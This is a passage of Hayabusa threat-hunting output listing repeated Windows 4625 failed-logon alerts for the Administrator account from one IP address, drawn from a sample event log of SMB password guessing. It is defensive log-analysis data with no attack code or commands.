NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: 